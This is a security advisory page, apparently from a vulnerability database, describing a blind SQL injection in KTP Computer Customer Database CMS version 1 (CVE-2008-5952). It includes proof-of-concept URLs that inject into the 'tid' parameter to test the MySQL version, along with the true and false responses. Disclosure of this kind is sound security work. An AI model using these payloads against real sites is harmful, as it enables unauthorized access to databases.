KTP Computer Customer Database CMS Blind SQL Injection Vulnerability

2009.01.27
Credit: CWH
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-5952
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================ KTPCCD CMS Blind SQL Injection Vulnerability ================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 30 November 2008 SITE : cwh.citec.us ##################################################### APPLICATION : APPLICATION : KTP Computer Customer Database CMS VERSION : 1 DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip ##################################################### **Need Magic_quote = Off** --- Blind SQL Injection --- Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit... --------- Exploit --------- Test Blind SQL Injection in MYSQL Version 5 [!]True [+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5-- Result Home Phone: 122-131-3123 Cell Phone: 123-123-3123 Fax Number: 123-213-1321 A+ Certifcation ID: 312 [!]False [+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4-- Result Home Phone: n/a Cell Phone: n/a Fax Number: n/a A+ Certifcation ID: (Technician is not certified) ####################################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK #######################################################################################

References:

http://xforce.iss.net/xforce/xfdb/46897
http://www.securityfocus.com/bid/32539
http://www.milw0rm.com/exploits/7305
http://www.frsirt.com/english/advisories/2008/3292
http://secunia.com/advisories/32888


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top